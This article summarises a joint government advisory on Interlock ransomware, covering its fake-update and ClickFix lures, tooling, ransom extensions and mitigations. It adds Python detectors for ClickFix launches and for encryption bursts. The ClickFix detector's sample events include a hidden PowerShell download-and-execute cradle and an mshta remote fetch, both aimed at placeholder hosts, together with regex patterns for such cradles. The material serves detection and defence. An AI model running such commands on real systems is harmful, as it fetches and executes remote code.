The Federal Bureau of Investigation (FBI), together with the Cybersecurity and Infrastructure Security Agency (CISA), the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), has issued a joint advisory on the intensified activity of the Interlock ransomware group. The group is financially motivated and targets a wide range of organizations, including critical infrastructure in North America and Europe. It practices double extortion: data is exfiltrated before systems are encrypted, and the threat of publishing that data is used as a second lever for payment.
Interlock ransomware was first observed in late September 2024, and FBI investigations as recent as June 2025 show its tactics still evolving. The group has built encryptors for both Windows and Linux, and both have been observed encrypting virtual machines. Open-source reporting also notes similarities between Interlock and the Rhysida ransomware variant.
What sets Interlock apart from many of its peers is its initial access methods. One is the drive-by download from legitimate websites that have been compromised: the malicious payload is disguised as a fake update for a widely used browser such as Google Chrome or Microsoft Edge, or for security software such as FortiClient and Cisco Secure Client. Because the lure is served from a site the victim already trusts, domain reputation alone is a weak control against it.
Interlock also uses the social engineering technique known as ClickFix, in which a fake CAPTCHA instructs the user to "verify" by pasting and running an attacker-supplied command in the system's command line. No exploit is involved: the victim executes the command themselves, which is why user awareness features among the recommended mitigations.
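The ClickFix pattern described above leaves a recognizable shape in endpoint telemetry: a script host such as powershell.exe or mshta.exe launched by the interactive shell (explorer.exe, which is the parent when a command is pasted into the Run dialog) with a command line that pulls and runs remote content. The following is an added example of detection logic written for this page, not code from the advisory or from any agency or vendor. The event records are constructed sample input in the shape of Sysmon Event ID 1 fields, and the indicator regexes and the "interactive parent plus script host plus one indicator" rule are this example's own heuristics.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# Sample input written for this example, not logs from a real Interlock
# intrusion; the command lines are generic ClickFix-style shapes.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://203.0.113.10/f.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha.example.invalid/verify.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c notepad.exe"},
]

# A command pasted into the Run dialog (Win+R) is launched by the shell, so the
# parent is explorer.exe. Add terminal hosts here to cover pastes into a console.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Script hosts and shells that ClickFix lures typically invoke.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Heuristic indicators chosen for this example (assumptions, not a vendor rule set).
INDICATORS = {
    "download-cradle": re.compile(
        r"(?i)\biwr\b|invoke-webrequest|invoke-expression|\biex\b|\bcurl\b"),
    "remote-url": re.compile(r"(?i)\bhttps?://"),
    "hidden-window": re.compile(r"(?i)-(w|win|windowstyle)\s+h(idden)?\b"),
    "encoded-command": re.compile(r"(?i)-(e|ec|enc|encodedcommand)\b"),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def clickfix_reasons(event: dict) -> list:
    """Indicator names that fire for one event. Empty if the process shape
    (interactive parent -> script host) does not match or nothing fires."""
    if basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return []
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return []
    cmd = event["CommandLine"]
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def find_clickfix_candidates(events: list) -> list:
    """Flag events whose process shape and command line both match."""
    hits = []
    for i, ev in enumerate(events):
        reasons = clickfix_reasons(ev)
        if reasons:
            hits.append({"index": i, "image": basename(ev["Image"]),
                         "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit)
```

Run against the sample, the rule flags the first two records (PowerShell download cradle with a hidden window, and mshta fetching a remote .hta) and ignores the developer's build script and the benign cmd launch. On a real host, the same command can be corroborated in the user's RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which records what was typed into the Run dialog.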
Once inside a network, Interlock uses Cobalt Strike and web shells for command and control, lateral movement, and data exfiltration. The actors harvest credentials, including usernames and passwords, and may deploy keyloggers to capture keystrokes, extending their reach with what they steal. According to the advisory, after the data has been exfiltrated they encrypt the compromised systems, appending extensions such as .interlock or .1nt3rlock to files. The ransom note does not state an amount; it directs victims to communicate through a .onion site reachable over Tor. The group has followed through on its threats to publish stolen data when the ransom, typically demanded in Bitcoin, is not paid.
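The encryption stage above is what most organizations detect first, and the file extensions the advisory reports (.interlock, .1nt3rlock) give a concrete hook. The block below is an added example, not code from the advisory or from any agency, showing the two things a responder wants from file-server audit data: a sliding-window detector that fires when many files gain a ransom extension within a short interval, and a per-directory count for scoping restores. The audit records are constructed sample input, the (timestamp, path) shape is an assumption about the feed, and the threshold and window values are tuning choices for this example.

```python
from collections import Counter
from datetime import datetime, timedelta

# Extensions the advisory reports Interlock appending to encrypted files.
INTERLOCK_EXTENSIONS = (".interlock", ".1nt3rlock")

# Constructed file-server audit records: (ISO timestamp, path after the write
# or rename). Sample data for this example, not telemetry from a real incident.
SAMPLE_FILE_EVENTS = [
    ("2025-06-01T02:00:00", r"\\fs01\share\finance\budget.xlsx"),           # ordinary save
    ("2025-06-01T02:14:03", r"\\fs01\share\finance\budget.xlsx.interlock"),
    ("2025-06-01T02:14:04", r"\\fs01\share\finance\q1.docx.interlock"),
    ("2025-06-01T02:14:04", r"\\fs01\share\finance\q2.docx.1nt3rlock"),
    ("2025-06-01T02:14:05", r"\\fs01\share\hr\salaries.xlsx.interlock"),
    ("2025-06-01T02:14:07", r"\\fs01\share\hr\review.pdf.INTERLOCK"),       # case can vary
    ("2025-06-01T02:14:09", r"\\fs01\share\hr\notes.txt.interlock"),
    ("2025-06-01T03:30:00", r"\\fs01\share\it\inventory.csv"),
]


def has_ransom_extension(path, extensions=INTERLOCK_EXTENSIONS):
    """True if the final extension is a known ransom extension.
    Case-insensitive; '.interlock.bak' does not match."""
    return path.lower().endswith(extensions)


def parent_dir(path):
    """Directory part of a Windows/UNC path without a trailing separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[0]


def detect_encryption_burst(events, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window count of files gaining a ransom extension.
    Returns (window_start, window_end, count) for the first window in which
    at least `threshold` such files appear, or None if no window qualifies.
    `threshold` and `window` are tuning assumptions, not advisory values."""
    hits = sorted(datetime.fromisoformat(ts) for ts, path in events
                  if has_ransom_extension(path))
    start = 0
    for end, ts in enumerate(hits):
        while ts - hits[start] > window:   # slide the left edge forward
            start += 1
        if end - start + 1 >= threshold:
            return hits[start], ts, end - start + 1
    return None


def affected_directories(events):
    """Affected-file count per directory, to scope restore work."""
    return Counter(parent_dir(path) for _, path in events
                   if has_ransom_extension(path))


if __name__ == "__main__":
    print(detect_encryption_burst(SAMPLE_FILE_EVENTS))
    print(affected_directories(SAMPLE_FILE_EVENTS).most_common())
```

On the sample, six files gain a ransom extension within six seconds, so the detector fires at the fifth one (02:14:03 to 02:14:07) and the directory count points at two shares to restore. A rule keyed to specific extensions is brittle, since extensions change between variants; the same sliding window applied to renames onto any extension not on an allowlist catches the behaviour rather than the name.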
To counter Interlock, the agencies urge organizations to act now. The recommended measures start with blocking initial access: DNS filtering and web access firewalls, plus staff training to recognize the fake-update and ClickFix lures. Organizations should keep operating systems, software, and firmware up to date, prioritizing known vulnerabilities, and should require strong authentication, including multi-factor authentication (MFA), backed by robust identity and access management policies.
Network segmentation is also essential to limit how far ransomware can spread, and organizations should maintain multiple offline, immutable backups of critical data so that recovery does not depend on paying. Resources from the ongoing #StopRansomware initiative can help organizations strengthen their defenses against these evolving threats.